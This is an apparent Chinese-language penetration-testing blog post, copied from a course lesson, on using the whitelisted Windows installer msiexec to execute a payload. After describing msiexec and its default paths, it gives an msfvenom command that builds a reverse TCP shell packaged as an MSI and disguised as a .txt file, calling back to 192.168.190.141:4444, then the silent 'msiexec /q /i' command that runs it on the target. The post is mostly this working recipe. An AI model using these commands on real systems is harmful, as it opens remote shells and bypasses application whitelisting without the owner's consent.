滲透測試-基于白名單執行payload--Msiexec

複現亮神課程基于白名單執行payload--Msiexec

0x01 關于msiexec

Msiexec 是 Windows Installer 的一部分。用于安裝 Windows Installer 安裝包（MSI）,一般在運作 Microsoft Update 安裝更新或安裝部分軟體的時候出現，占用記憶體比較大。并且內建于 Windows 2003，Windows 7 等。

說明：Msiexec.exe所在路徑已被系統添加PATH環境變量中，是以，Msiexec指令可識别。

Windows 2003 預設位置：

C:\WINDOWS\system32\msiexec.exe

C:\WINDOWS\SysWOW64\msiexec.exe

滲透測試-基于白名單執行payload--Msiexec滲透測試-基于白名單執行payload--Msiexec

Msf配置:

滲透測試-基于白名單執行payload--Msiexec滲透測試-基于白名單執行payload--Msiexec

配置payload:

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.190.141 LPORT=4444 -f msi > hacker.txt

滲透測試-基于白名單執行payload--Msiexec滲透測試-基于白名單執行payload--Msiexec

靶機執行:

C:\Users\Administrator\Desktop\Msiexec>msiexec /q /i hacker.txt

滲透測試-基于白名單執行payload--Msiexec滲透測試-基于白名單執行payload--Msiexec

posted @ 2019-05-02 09:46 卿先生閱讀(...) 評論(...) 編輯收藏